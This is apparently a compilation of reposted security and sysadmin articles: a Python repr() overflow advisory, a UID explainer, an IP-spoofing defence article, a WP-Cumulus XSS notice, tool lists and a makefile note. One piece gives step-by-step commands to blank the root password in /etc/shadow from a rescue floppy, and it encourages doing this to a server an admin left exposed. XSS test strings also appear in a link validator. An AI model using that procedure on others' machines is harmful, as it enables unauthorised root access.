Buffer overrun in repr() for UCS-4 encoded unicode strings

Python Security Advisory


Advisory ID: PSF-2006-001
Issue Date: October 12, 2006
Product: Python
Versions: 2.2, 2.3 prior to 2.3.6, 2.4 prior to 2.4.4, wide unicode (UCS-4) builds only
CVE Names: CAN-2006-4980

Python is an interpreted, interactive, object-oriented programming language. It is often compared to Tcl, Perl, Scheme or Java.

The Python development team has discovered a flaw in the repr() implementation of Unicode string objects which can lead to execution of arbitrary code due to an overflow in a buffer allocated with insufficient size.

The flaw only manifests itself in Python builds configured to support UCS-4 Unicode strings (using the --enable-unicode=ucs4 configure flag). This is still not the default, which is why the vulnerability should not be present in most Python builds out there, especially not the builds for the Windows or Mac OS X platform provided by www.python.org.

You can find out whether you are running a UCS-4 enabled build by looking at the sys.maxunicode attribute: it is 65535 in a UCS-2 build and 1114111 in a UCS-4 build.
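The two facts a sysadmin needs from this advisory, the build type and the affected version ranges, can be turned into a fleet check. The following is an added example, not code from the advisory or from python.org; it encodes the version ranges exactly as the advisory states them and reads sys.maxunicode the way the paragraph above describes.

```python
import sys

# sys.maxunicode values named in the advisory for the two build types.
WIDE_BUILD_MAXUNICODE = 1114111    # --enable-unicode=ucs4 build (affected)
NARROW_BUILD_MAXUNICODE = 65535    # UCS-2 build (not affected)


def is_wide_unicode_build(maxunicode):
    """True for a UCS-4 ("wide") build, judged by sys.maxunicode."""
    return maxunicode == WIDE_BUILD_MAXUNICODE


def version_affected(version):
    """Advisory ranges: 2.2 (all), 2.3 before 2.3.6, 2.4 before 2.4.4.
    2.5 and later are not affected.  version is (major, minor, micro)."""
    major, minor, micro = version[:3]
    if major != 2:
        return False
    if minor == 2:
        return True
    if minor == 3:
        return micro < 6
    if minor == 4:
        return micro < 4
    return False


def is_vulnerable(version, maxunicode):
    """Both conditions must hold: affected version AND wide-unicode build."""
    return is_wide_unicode_build(maxunicode) and version_affected(version)


def check_running_interpreter():
    """Apply the check to the interpreter executing this code.
    Note: Python 3.3+ always reports sys.maxunicode == 1114111, so the
    version test is what keeps modern interpreters out of the result."""
    return is_vulnerable(tuple(sys.version_info[:3]), sys.maxunicode)


if __name__ == "__main__":
    print("version", sys.version_info[:3], "maxunicode", sys.maxunicode,
          "affected:", check_running_interpreter())
```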

More information can be found in this posting to the python-dev mailing list: http://mail.python.org/pipermail/python-dev/2006-October/069260.html

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2006-4980 to this issue.

Python 2.4.4 and Python 2.3.6 are available from www.python.org and contain a fix for this issue. Python 2.5 also contains the fix and is not vulnerable.

Patches for Python 2.2, 2.3 and 2.4 are also immediately available:

* http://python.org/files/news/security/PSF-2006-001/patch-2.3.txt (Python 2.2, 2.3)
* http://python.org/files/news/security/PSF-2006-001/patch-2.4.txt (Python 2.4)

Acknowledgement: thanks to Benjamin C. Wiley Sittler for discovering this issue.

reference:python.org

Rooting Linux with a floppy

You have lost your root password on your Linux box and now you are considering formatting
everything to regain control? Your admin is a moron that leaves the server physically
available to everybody? You want to test your Linux box? Don't worry: if you have at least
a floppy rescue disk at hand, you can root it ;-)

The problem with the new version of Linux since 6.2 is :

a) the shadow suite that is installed by default (masking the password in the shadow file)

b) the md5 encryption (34 characters vs 13 for standard DES), so it's not as easy as it was
in the previous versions, i.e. simply getting the /etc/passwd file and running JtR against it
doesn't work anymore.

What to do now? Follow the guide :

1- Boot with a rescue disk

2- type the appropriate key to get into rescue mode (ex.F4)

3- linux rescue (to get into this mode)

4- $ mknod /dev/hda (to create a virtual HD)

* * * N o t e * * *

If you have more than one partition on your HD, check which one is the Linux partition:

A- $ fdisk /dev/hda

B-( fdisk) : p (to show the current partitions) : m (for commands)

5- $ mknod /dev/hda2 ( create the partition2 device if you have a DOS partition as primary
partition for example)

6- $ mkdir /data (to create a virtual directory in the RAM drive)

7- $ mount -t ext2 /dev/hda2 /data ( to mount the files in the virtual dir located in the
RAM drive)

8-$ cd /data/etc

9- $ chmod 700 /data/etc/shadow
or $ chmod u+w /data/etc/shadow ( to gain write access on the shadow file)

10-$ /data/bin/vi /data/etc/shadow (to edit the shadow file with VI editor)

11- type i to insert, then remove the root password by positioning the cursor on the
characters and typing the x key

12- type escape key then ” : ”

13- save the file with : wq!

At this point, everything you have done is in RAM and nothing is done on the HD so DON’T
REBOOT YET!!

14- $ cd / (to return back to /)

15- $ umount /data

16- $ init 0 (rebooting the system)

Now you can log in as root; there is no password protecting root anymore.

Take care everyone, Just1ce.

reference:http://www.exploitx.com/69/rooting-linux-with-a-floppy/

Linux > More on USER ID, Password, and Group management

In order to log in to a Linux system (over ssh or other services) you need a username and password.
Usernames and passwords are stored in the /etc/passwd and /etc/shadow files respectively. When you supply a password, it is encrypted and compared with the password stored in /etc/shadow, which is also in encrypted format (it was stored when you or the system administrator registered/updated it). If both are equal, you are in. Once logged in, you become a number to the Linux kernel. You can obtain your user id and other information using the id command:

$ id
uid=1002(vivek) gid=1002(vivek) groups=1002(vivek), 0(wheel)

Where,
=> Username = vivek
=> User numeric id (uid) = 1002

Numbers are used to represent users and groups in the Linux kernel because:
1) Simplified user and group management
2) Security management is easy
3) Your UID is applied to all files you create

It is always a good idea to use a UID above 1000 for all users, for security reasons.
Zero UID

The UID number 0 is special and used by the root user. UID zero (0) enjoys unrestricted/unlimited access to the Linux system. Note that UID 0 is assigned to the name root; if you wish you can change this and assign a different name (poorly written programs may fail).

Similarly, you have a group id (GID). It is used by Linux to refer to group names. A single user can be a member of multiple groups. This results in very good flexibility for accessing the system and sharing files. Many UNIX systems use the wheel group as the power-user group. Like UID zero, GID zero enjoys unrestricted/unlimited access to the Linux system.

Sometimes Linux and other UNIX-like systems (FreeBSD, Solaris etc.) use the EUID, RUID, and SUID concepts.
The Effective User ID (EUID)

It is used to determine what level of access the current process has. When the EUID is zero, the process has unrestricted/unlimited access. The following commands can be used to print the Effective User ID under Linux:
$ whoami
$ id -un
The Real User ID (RUID):

It is used to identify who you actually are. Once it is set up by the system (usually the login program) it cannot be changed until your session terminates. You cannot change your RUID. Only root (or a person having zero UID) can change the RUID. Use the id command as follows to obtain the Real User ID:
$ id -ru
The Saved User ID (SUID):

When a new process / executable file such as passwd is started, the effective user id that is in force at the time is copied to the saved user id. Because of this feature, you are able to update your own password stored in the /etc/shadow file. Of course, the executable file must have the set-user-id bit on in order to setuid (system call). Before the process ends it switches back to the SUID.

In short,

* RUID : Identifies the real user; a normal user cannot change it.
* EUID : Decides the access level; a normal user can change it.
* SUID : Saves the EUID; a normal user cannot change it.
* Real Group ID : Identifies the real group
* Effective Group ID and Supplementary group IDs : Decide the access level

Note that access level means kernel can determine whether you have access to devices, files etc.
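The summary above can be checked against the kernel. The following is an added example, not code from cyberciti.biz: it reads the three ids with os.getresuid(), encodes the Linux rule for which EUID changes an unprivileged process is allowed (only to its real, effective or saved id, unless its EUID is 0), classifies the common states (the setuid passwd case included), and asks the kernel directly by attempting a seteuid() and restoring afterwards. The function and state names are this example's own.

```python
import os


def current_ids():
    """(real, effective, saved) user ids of this process, as the kernel reports them."""
    return os.getresuid()


def euid_change_permitted(ruid, euid, suid, target):
    """Linux rule for seteuid(): a process whose EUID is 0 may choose any id;
    any other process may only move its EUID to its real, current effective,
    or saved id.  This is why 'normal user can change EUID' is a limited freedom."""
    return euid == 0 or target in (ruid, euid, suid)


def privilege_state(ruid, euid, suid):
    """Human-readable classification of an (RUID, EUID, SUID) triple."""
    if ruid == 0 and euid == 0:
        return "root"
    if euid == 0:
        return "setuid-root program running for uid %d" % ruid
    if suid == 0:
        # The passwd case after dropping privileges: EUID is the user, but
        # the saved id 0 lets the program regain root before it exits.
        return "setuid-root program, privileges temporarily dropped to uid %d (can regain)" % euid
    if ruid == euid == suid:
        return "unprivileged process of uid %d" % ruid
    return "process with mixed ids: r=%d e=%d s=%d" % (ruid, euid, suid)


def euid_switch_allowed(target):
    """Ask the kernel: try seteuid(target), then put the previous EUID back.
    Restoring works because in every normal state the previous EUID is either
    the real or the saved id, which stay in the permitted set."""
    ruid, euid, suid = os.getresuid()
    try:
        os.seteuid(target)
    except PermissionError:
        return False
    os.seteuid(euid)
    return True


if __name__ == "__main__":
    r, e, s = current_ids()
    print("ruid=%d euid=%d suid=%d -> %s" % (r, e, s, privilege_state(r, e, s)))
    print("may switch EUID to own RUID:", euid_switch_allowed(r))
    print("may switch EUID to 0:", euid_switch_allowed(0))
```

Run as an ordinary user the last line prints False, run as root it prints True; the pure functions let you reason about a triple seen in /proc/PID/status without having to be that process.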

reference: http://www.cyberciti.biz/

Source Address Spoofing

by Rik Farrow

Network Magazine

Networks rely on the truth. Without accurate information, networks work poorly, if at all. However, there are those who use lies to deceive networks and the systems attached to them. These lies can take many forms, such as source address spoofing, but lie detectors exist to help you spot falsehoods and keep your network secure.

Source address spoofing alters a packet's return address so that the packet appears to have come from a source other than the sender. An attacker uses source address spoofing for two reasons: to gain access to resources that only accept requests from specific source addresses, or to hide the source of an attack.

Attackers have used this technique for many years. In fact, the Distributed Denial of Service (DDoS) attacks launched against commercial sites in February 2000 used source address spoofing. Other forms of attack also employ this technique, but most of them would prove unsuccessful today—except for those involving SNMP.

Source address spoofing is often misunderstood, and therefore a cause for concern. Without preventative measures in place, you could become a victim of source addressing spoofing. (A more likely scenario would turn you into an unknowing source of a source-address-spoofing attack.)
Local And Remote

While relying on source addresses to protect services is not a good idea, software that is oriented toward the source of requests is still common. For example, SNMP—a security disaster—often attempts to protect agents on network devices or systems by only accepting requests from specific source addresses. Also, UNIX r commands, the Network File System (NFS), Server Message Block (SMB), and TCP wrappers all include the source address (or system name, in the case of NFS) as part of the access control checks.

These services are especially vulnerable to local attacks in unswitched networks. This is because it is easy for an attacker to sniff packets in an unswitched network, and sniffing contributes to the success of most attacks. On the other hand, switched networks make it difficult (if not impossible) to sniff packets.

SNMP is a good example. Suppose SNMP agents have been configured to only respond to requests for information or changing variables from a server at the address 10.2.2.98. Using netcat, a tool for sending or receiving IP packets, an attacker can easily spoof a request from 10.2.2.98 and send it to the agent of his or her choice.

When the agent responds, it will send the response back to 10.2.2.98. The real manager will ignore the response, as it won't correspond to any outstanding request. The attacker, however, will need to sniff the response off the network for the attack to succeed, as the response was routed back to the real SNMP manager.

Even if the attacker cannot sniff the response, the attack might still succeed, as variables can be successfully changed (via an SNMP set command) without seeing the response. If the attacker shares the same subnet with the manager, the attacker might use Reverse Address Resolution Protocol (RARP) to masquerade as the manager of the IP address.

Remote attacks that seek access via source address spoofing must also have some way of seeing the return packets. Keep in mind that when a remote attacker spoofs some other network's source address, the responses will be routed to that other network, and the attacker will not receive those packets. Of course, the attacker might be able to sniff along the route to the other network. This type of attack, which requires breaking into systems located within ISPs or other intermediate networks, has been successfully carried out.
Source Route

Another old trick that may still work involves source routing. Source routing is an IP option used today mainly by network managers to check connectivity. Normally, when an IP packet leaves a system, its path is controlled by the routers and their current configuration. Source routing provides a means to override the control of the routers.

Source routing can be strict or loose. Strict source routing lets a manager specify the path through all the routers to the destination. Return responses use the same path in reverse. Loose source routing lets managers specify an address that the packet must pass through on its way to the destination. It is loose source routing that aids an attacker.

A remote attacker might seek to access a UNIX system protected with TCP wrappers, or a Windows NT Internet Information Server (IIS) protected by an access list based on source addresses. If the attacker simply spoofs one of the permitted source addresses, the attacker may never get a response. However, if the attacker both spoofs an address and sets the loose-source-routing option to force the response to return to the attacker's network, the attack can succeed.

The simplest defense against loose source routing is to not permit these packets to enter (or leave) the network. Just about any firewall will block any packet that has source routing enabled by default. You can also configure routers to block packets with source routing. TCP wrappers and many UNIX OSs can also block source-routed packets.

An attacker might also attempt "blind spoofing" to gain access to a system that "protects" itself by checking source addresses. In blind spoofing, the attacker may not need to see the responses for the attack to be successful. The first known version of this attack was launched against security specialist Tsutomu Shimomura in 1994. Shimomura was using TCP wrappers to protect his UNIX system from unauthorized access. However, the attacker succeeded by guessing the sequence numbers used in the response packets during the attack, which enabled the attack to change the configuration of the targeted system.

Sequence number attacks have become much less likely because OS vendors have changed the way initial sequence numbers are generated. The old way was to add a constant value to the next initial sequence number; newer mechanisms use a randomized value for the initial sequence number. (There are some constraints on this "random" value, however, to keep it from working incorrectly.)

Using the source address to authorize a network request is not safe. To improve your security, replace r commands with Secure Shell (SSH), and only use NFS and SMB with improved authentication (SMB has stronger authentication in all versions beyond Windows for Workgroups).

SNMP 1 and SNMP 2 still rely on source addresses for security. While you can block SNMP at the borders of your networks, you will remain vulnerable to SNMP-based scanning and attacks on your internal networks until SNMP 3 has been implemented and installed.
Hiding The Source

Besides spoofing source addresses for phony authentication, attackers can also spoof their own source addresses in attacks where reply packets are not important. Any network-based Denial of Service (DoS) attack fits this description because the point of the attack is not to get a response but instead to flood the target with requests.

In DoS attacks, it actually makes more sense for the attacker to spoof the source address, otherwise the attacker might wind up blocking his or her own access to the network. Spoofing source addresses also makes tracking the attack much more difficult, as the packets themselves must be traced on each network and subnet, back to the source.

Source address spoofing requires root access on UNIX systems. The attacker must have root access so that the attack software can open a "raw" network socket. Most applications use "cooked" sockets, in which the IP stack provides the necessary packet headers. A raw socket means that the application must prepare the necessary headers itself—that is, do its own cooking. This permits the attacker to put any information he or she wants in the headers, including spoofed source addresses. Note that Windows NT also supports raw sockets, so this is not just a UNIX issue.
How To Get Spoof-Proof

DoS attacks that use source address spoofing became popular in 1997. RFC 2267 was written in response to this type of attack. It suggests that ISPs practice ingress filtering (see Distributed Denial of Service Attacks, March 2000). In general terms, this means that ISPs should filter traffic and drop any packets with spoofed source addresses. In practical terms, this has proven difficult.

One problem is that many ISPs do not have the technical ability to arrange packet filtering to block packets with spoofed source addresses. Also, many complain that packet filtering reduces equipment performance. While this was true in the past, it is not so today. In the early 1990s, adding packet filtering to a Cisco Systems router could cut throughput by as much as 70 percent. Today, routers have better designs, and it is possible on some routers to block packets with spoofed source addresses with no effect on throughput at all.

For example, Cisco Express Forwarding (CEF) is an advanced IP switching technology, designed for high-performance layer-3 IP backbone switching. You can configure this by executing the following command while in configuration mode:

ip verify unicast reverse-path

A router (or a layer-3 switch) bases routing decisions on the destination address and the routing information. Using the same mechanism, a router can examine the source address and determine if it came from the correct interface. (The route to the source leads back the way it arrived.)

If the route is not the same, the source address must be spoofed, unless asymmetric routes are being used. Asymmetric routes mean that there is more than one way to reach the destination. If asymmetric routing is not in use, enabling this facility will block all packets with spoofed source addresses.

Linux and Berkeley Software Distribution (BSD) system kernels also support a similar facility. If you are using a Linux or BSD system as a router or terminal server, either can be configured to block packets with spoofed source addresses (merely by setting a kernel parameter). In Linux systems, you can enable this mechanism by echoing "2" to each rp_filter name found in the /proc file system (/proc/sys/net/ipv4/conf/*/rp_filter).

Terminal servers can also block packets with spoofed source addresses. Some terminal servers do this by default. Others can do this by applying an access control list to the Ethernet connection coming from the terminal server (rather than on each incoming modem port). Reports posted to SecurityFocus.com's Bugtraq archives indicated no performance loss at all: CPU usage did increase, but it remained well below 50 percent utilization.
Tell Me No Lies

The simple solution is to block packets with obviously spoofed source addresses from entering your network. Most firewalls do this by default. If you use packet filters, block packets as they enter the external interface if they have internal source addresses, private network addresses, or the local host address (127/8).
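The two mechanisms the article recommends, the reverse-path check a router performs with its own routing table (How To Get Spoof-Proof) and the static filter on the external interface (this section), are small enough to model. The following is an added example, not code from the article or from any router vendor: it performs a longest-prefix lookup over a constructed routing table, applies the strict reverse-path rule to a packet's source and arriving interface, and applies the border rule to internal, RFC 1918 and 127/8 sources. Interface names and the 203.0.113.0/24 and 198.18.0.0/15 "internal" blocks are constructed for the example.

```python
import ipaddress

# Constructed routing table: prefix -> interface the route points out of.
# eth0 faces the ISP; the other two interfaces face the site's own networks.
ROUTES = {
    "0.0.0.0/0": "eth0",        # default route towards the Internet
    "203.0.113.0/24": "eth1",   # internal network A
    "198.18.0.0/15": "eth2",    # internal network B
}


def route_interface(addr, routes=ROUTES):
    """Longest-prefix match: the interface this router would use to reach addr."""
    ip = ipaddress.ip_address(addr)
    best_net, best_iface = None, None
    for prefix, iface in routes.items():
        net = ipaddress.ip_network(prefix)
        if ip in net and (best_net is None or net.prefixlen > best_net.prefixlen):
            best_net, best_iface = net, iface
    return best_iface


def urpf_accept(src, arriving_iface, routes=ROUTES):
    """Strict reverse-path check (the idea behind 'ip verify unicast reverse-path'):
    accept only if the route back to src leaves via the interface the packet
    arrived on.  With asymmetric routing this drops legitimate traffic, which is
    why the article says to enable it only where routes are symmetric."""
    return route_interface(src, routes) == arriving_iface


# Sources that must never enter from the outside: private ranges and loopback.
BOGON_SOURCES = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def border_accept(src, internal_prefixes):
    """Ingress filter on the external interface: drop packets whose source is one of
    our own internal prefixes, a private-network address, or the local host block."""
    ip = ipaddress.ip_address(src)
    if any(ip in ipaddress.ip_network(p) for p in internal_prefixes):
        return False
    return not any(ip in net for net in BOGON_SOURCES)


if __name__ == "__main__":
    internal = ["203.0.113.0/24", "198.18.0.0/15"]
    for src, iface in (("203.0.113.5", "eth1"), ("203.0.113.5", "eth0"),
                       ("198.51.100.7", "eth0"), ("192.168.1.10", "eth0")):
        print(src, "on", iface, "uRPF:", urpf_accept(src, iface),
              "border:", border_accept(src, internal) if iface == "eth0" else "n/a")
```

The second case, an "internal" source arriving on the ISP-facing interface, is the classic spoof; the reverse-path check catches it without any hand-written filter because the routing table already knows where 203.0.113.0/24 lives.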

Source address spoofing does not need to be a problem—mechanisms for thwarting it abound. Take the time to be a good Netizen and block these packets at the border of your network. Stop lying packets at the source.

Rik Farrow is an independent security consultant. His Web site, http://www.spirit.com, contains security links and information about network and computer security courses. He can be reached at mailto: rik@spirit.com.
Resources

Computer security expert Wietse Venema's Web site includes information about TCP wrappers. Go to http://www.porcupine.org.

Reports about configuring terminal servers and routers to block spoofed source addresses are available from SecurityFocus.com's Bugtraq archives.

RFC 2267, entitled "Defeating Denial of Service Attacks which Employ IP Source Address Spoofing," is available at http://www.faqs.org/rfcs/rfc2267.html.

reference:http://technet.microsoft.com/en-us/library/cc723706.aspx

WP-Cumulus updated to address yet another security issue



A few weeks ago I rushed out an update to fix a potentially dangerous Cross-Site Scripting (XSS) vulnerability in WP-Cumulus. With the PHP part of the plugin shielded from 'outside use', I was hoping no more issues would pop up. Still, I'm glad MustLive alerted me to another issue that uses the Flash movie itself. The exploit worked by calling the SWF file directly and supplying a link with javascript. I'm not quite sure how dangerous this is, but I've modified the movie so it only executes regular links.

Please update your copy of WP-Cumulus to 1.23 asap. For most users it should only take two clicks.

This should not affect how WP-Cumulus works on WordPress blogs. But there have been a number of ports and other projects that use the Flash movie. I urge the authors of those projects to examine the new Flash movie, and see if it still works in/with their product. The exploit is not unique to WordPress, and they may need to modify the security check to fit their project.
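For authors of the ports mentioned above, the check "only execute regular links" is a scheme allowlist rather than a blocklist of javascript:. The following is an added example of that check in Python, not the WP-Cumulus code and not the ActionScript in the movie; it accepts http(s) URLs and scheme-less relative paths, and handles the usual evasions (leading whitespace, mixed case, embedded tabs or newlines, control characters) that a naive string compare misses.

```python
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_regular_link(link):
    """True only for links a tag cloud should follow: http(s) URLs or relative
    paths.  javascript:, data:, vbscript: and anything else are rejected."""
    if not isinstance(link, str):
        return False
    # Browsers ignore tabs and newlines inside a scheme and skip leading blanks,
    # so normalise the same way first or "java\tscript:" would be read as relative.
    cleaned = "".join(ch for ch in link if ch not in "\t\r\n").strip()
    if not cleaned:
        return False
    # Remaining control characters are never part of a legitimate link.
    if any(ord(ch) < 32 for ch in cleaned):
        return False
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme == "":
        return True          # relative link such as /tag/security
    return scheme in ALLOWED_SCHEMES


if __name__ == "__main__":
    for candidate in ("http://example.com/tag/security", "/tag/security",
                      "javascript:alert(1)", " JavaScript:alert(1)",
                      "java\tscript:alert(1)", "data:text/html,x"):
        print(repr(candidate), "->", is_regular_link(candidate))
```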

reference:http://www.roytanck.com/

10 Really Useful Server Monitoring Tools

1. Pingdom

Pingdom, which is also available as an iPhone application, makes sure that your website is reachable and responding properly at all times, providing you with email and SMS alerts if it’s not. It monitors uptime and overall performance, creating charts and tables that are easy to understand, enabling you to spot trends and accurately pinpoint problems.

2. Dotcom-Monitor

Dotcom-Monitor is an advanced website monitoring service which maximises your uptime so that you can increase sales and provide a continuous service to customers worldwide, protecting the reputation of your business. It provides real-time and email reports and charts, and sends alerts to exactly the right people when problems arise. It even lets you create multiple logins for numerous users, each of which has permission to access different parts of the tool.

3. McAfee Secure

McAfee Secure monitors your servers for potential security breaches, protecting end-users of your website from identity theft, credit card fraud, spyware, spam, viruses and online scams. Your site is tested and certified daily, and awarded the “live” McAfee Secure mark to show that it has passed its daily test, which greatly increases shopper confidence. McAfee currently certify over 80,000 websites, all of which are listed on the McAfee Secure database.

4. Webmetrics GlobalWatch

GlobalWatch monitors a diverse range of websites, internet applications and services. It identifies and diagnoses downtime, errors and poorly performing transactions, providing performance measurements, detailed reports and flexible alerts. This powerful tool, which supports Web 2.0, AJAX and plugin-based applications like Flash and Java, gives you a truly global perspective on how end-users see your site with monitoring agents stationed in the USA, Asia, Africa and Europe.

5. Nimsoft Monitoring Solutions (NMS)

NMS monitors your servers and their configured server applications. All core server resources, from CPU to memory, event logs, print jobs and queues are accounted for. NMS is not only quick and easy to install, but lightweight (you only install the bits that you really need) and scalable (you can monitor hundreds and even thousands of servers at a time). The NMS dashboard is simple and clear with views showing all your servers interconnected, colour-coded status indicators and server-to-server response times.

6. Solarwinds Orion Network Performance Monitor (NPM)

Orion NPM makes sure that every one of your servers is working 100% efficiently, but it doesn’t stop there: it monitors all routers, switches and wireless access points in your network too. It’s quick to set up, very attractive (a rarity in server monitoring) and supported by hundreds of expert network engineers. What’s more, you don’t have to be an expert yourself to use it: anyone can get it up and running in under an hour, straight out of the box.

7. Nagios

Nagios is a comprehensive IT infrastructure monitoring system that provides a snapshot of your entire operations network while keeping tabs on the health and status of all your applications, services, operating systems, network protocols and system metrics. Instant alerts are sent to your IT staff by email and SMS as soon as problems arise and failed servers, applications and devices can be restarted automatically. Nagios is highly compatible with almost all in-house and third party applications.

8. ENVIROMUX Server Environment Monitoring System

This powerful tool, which is perfect for use in data centers, web hosting facilities, telecom switching sites and server closets, monitors temperature, humidity, liquid presence, motion, intrusion and vibration, to ensure that your server's operating in ideal physical conditions. You can integrate up to eight video cameras into the system to get a live view from anywhere in the world. Nagios users get 5% off the list price.

9. Jacarta interSeptor Pro

The interSeptor Pro records and charts temperature and humidity conditions surrounding your server. It alerts you (via email or SMS) when air conditioning settings should be adjusted to maximise energy savings. Three different models are available: the big 8-port (8 different temperature and humidity sensors), the huge 16-port and the massive 24-port. Additional alarm sensors can be added to detect water leaks, smoke and power failures.

10. Simple Server Monitor

Simple Server Monitor provides a substantial monitoring service for those on a tight budget. It costs just $69.95, following a 30-day free trial. Despite its tiny price tag, it’s packed full of useful features including up-to-the-minute monitoring of uptime and accessible performance charts. It uses popup messages, desktop alarms, email and SMS to alert you to any network uptime losses.

reference:http://www.webdesignbooth.com/10-really-useful-server-monitoring-tools/

Goodbye str0ke... Rest In Peace

Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while. I recently was informed that str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.

Sadly....

I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.

We wish nothing but blessing to his wife and 4 children.

RIP str0ke 1974-04-29 - 2009-11-03 09:23

goodbye str0ke... you're elite... thanks for your official website....

benchmark SMTP servers



This is a program I wrote to benchmark SMTP servers. I started work on this because I need to know which mail server will give the best performance with more than 1,000,000 users. I have decided to release it under the GPL because there is no benefit in keeping the source secret, and the world needs to know which mail servers perform well and which don’t!

At the OSDC conference in 2006 I presented a paper on mail relay performance based on the new BHM program that is now part of Postal.

I have a Postal category on my main blog that I use for a variety of news related to Postal. This post (which will be updated periodically) will be the main reference page for the software. Please use the comments section for bug reports and feature requests.

It works by taking a list of email addresses to use as FROM and TO addresses. I originally used a template to generate the list of users because if each email address takes 30 bytes of storage then 3,000,000 accounts would take 90M of RAM which would be more than the memory in the test machine I was using at the time. Since that time the RAM size in commodity machines has increased far faster than the size of ISP mail servers so I removed the template feature (which seemed to confuse many people).

When sending the mail the subject and body will be random data. A header field X-Postal will be used so that procmail can easily filter out such email just in case you accidentally put your own email address as one of the test addresses. ;)

I have now added two new programs to the suite, postal-list and rabid. Postal-list will list all the possible expansions for an account name (used for creating a list of accounts to create on your test server). Rabid is the mad Biff, it is a POP benchmark.

Postal now adds a MD5 checksum to all messages it sends (checksum is over the subject and message body including the “\r\n” that ends each line of text in the SMTP protocol). Rabid now checks the MD5 checksum and displays error messages when it doesn’t match.
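What the checksum buys you is end-to-end integrity of the benchmark traffic: a relay that rewrites line endings, truncates a line or re-encodes the body is caught on the POP side instead of being counted as a successful delivery. The following is an added example, not Postal's or Rabid's code: it assumes the digest is MD5 over the subject bytes followed by the body bytes exactly as sent (each line ending in \r\n), carries the value in an assumed X-Postal-Checksum header next to the X-Postal marker header the post mentions, and verifies it on the receiving side.

```python
import hashlib
import re

CRLF = "\r\n"
MARKER_HEADER = "X-Postal"               # named in the post
CHECKSUM_HEADER = "X-Postal-Checksum"    # assumed name for this example


def body_checksum(subject, body_bytes):
    """MD5 over the subject followed by the body as it goes on the wire,
    CRLF line ends included, so any rewrite of the body changes the digest."""
    h = hashlib.md5()
    h.update(subject.encode("utf-8"))
    h.update(body_bytes)
    return h.hexdigest()


def build_message(sender, recipient, subject, body_lines):
    """Sender side: compose headers + body, with the checksum computed first."""
    body = "".join(line + CRLF for line in body_lines)
    digest = body_checksum(subject, body.encode("utf-8"))
    headers = [
        "From: %s" % sender,
        "To: %s" % recipient,
        "Subject: %s" % subject,
        "%s: benchmark" % MARKER_HEADER,
        "%s: %s" % (CHECKSUM_HEADER, digest),
    ]
    return CRLF.join(headers) + CRLF + CRLF + body


def split_message(raw):
    """Receiver side: separate headers from the body without normalising the body,
    accepting CRLF or bare LF as the header terminator (a lenient relay may have
    rewritten it, and that rewrite is exactly what we want the digest to expose)."""
    m = re.search(r"\r?\n\r?\n", raw)
    if m is None:
        return {}, raw
    headers = {}
    for line in re.split(r"\r?\n", raw[:m.start()]):
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, raw[m.end():]


def verify_message(raw):
    """Return (ok, expected_digest, actual_digest) for a received message."""
    headers, body = split_message(raw)
    expected = headers.get(CHECKSUM_HEADER.lower())
    actual = body_checksum(headers.get("subject", ""), body.encode("utf-8"))
    return (expected == actual, expected, actual)


if __name__ == "__main__":
    # Constructed sample message for the demonstration.
    raw = build_message("a@example.com", "b@example.com", "Postal test",
                        ["first line", "second line"])
    print("intact:        ", verify_message(raw)[0])
    print("CRLF -> LF:    ", verify_message(raw.replace(CRLF, "\n"))[0])
    print("byte flipped:  ", verify_message(raw.replace("second", "sec0nd"))[0])
```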

I have added rate limiting support in Rabid and Postal. This means that you can specify that these programs send a specific number of messages and perform a specific number of POP connections per minute respectively. This should make it easy to determine the amount of system resources that are used by a particular volume of traffic. Also if you want to run performance analysis software to determine what the bottlenecks are on your mail server then you could set Postal and Rabid to only use half the maximum speed (so the CPU and disk usage of the analysis software won’t impact on the mail server).

I will not release a 1.0 version until the following features are implemented:


* Matching email sent by Postal and mail received by BHM and Rabid to ensure that each message is delivered correctly (no repeats and no corruption)

* IMAP support in Rabid that works

* Support for simulating large numbers of source addresses in Postal. This needs to support at least 2^24 addresses so it is entirely impractical to have so many IP addresses permanently assigned to the test machine.

* Support for simulating slow servers in Postal and BHM (probably reducing TCP window size and delaying read() calls)

* Making BHM simulate the more common anti-spam measures that are in use to determine the impact that they have on list servers

* Determining a solution to the problem of benchmarking DNS servers. This may mean just including documentation on how to simulate the use patterns of a mail server using someone else’s DNS benchmark, but may mean writing my own DNS benchmark.

download link: http://www.coker.com.au/postal/postal-0.70.tgz

reference: http://doc.coker.com.au/projects/postal/

Geany

Since a specific dependency can be passed as parameter when the makefile is called I guess an IDE uses this to execute the required command. For example:

COMPILER = /usr/local/cris/bin/gcc-cris
CFLAGS = -mlinux -o
SOURCES = main.c
TARGET = Hello_World
DESTINATION = root@FOXBoard:/mnt/flash/bin/HelloWorld

# none of these targets is a file, so always run them when asked for
.PHONY: all compile build

# top-level rule to create the program, executed by default if no params are provided
all: compile

# called by pressing the Compile or Build button in Geany
# (make requires every recipe line to start with a tab character)
compile: $(SOURCES)
	$(COMPILER) $(CFLAGS) $(TARGET) $(SOURCES)

# build first satisfies the compile dependency, then copies the executable to the board
build: compile
	scp $(TARGET) $(DESTINATION)

When the command make compile is executed, the code is only compiled. When the command make build is executed, it first executes the compile dependency and then copies the executable to the target. I would expect that the IDE provides the basic menu structure and allows the programmer to enter the command to execute when the menu item is selected. In that case, it's easy to integrate custom compilers or special target needs in the default IDE.

After spending an hour searching for how this works in Anjuta I could not find how to make this work. It might be that Anjuta is already too complex for what I want: it is designed for working with huge open source projects, whereas in my case it will be a couple of local files that need to be managed.

Searching the internet for a simple Linux IDE results in several hits referring to Geany. The home page states "It was developed to provide a small and fast IDE, which has only a few dependencies from other packages". Sounds like this is what I'm looking for. Using the Applications | Add/Remove... menu in Ubuntu shows that Geany can automatically be installed.

After installation and starting Geany it is easy to find your way in this program. First guess is that I will be needing to setup a new project, using the Project | New menu option. It asks for a project name (HelloWorld), the file to store the project settings in (HelloWorld.geany) and the base folder of the project (/home/jan/FOXBoard/HelloWorld). After pressing the create button I can open the files that I already created before manually (main.c).

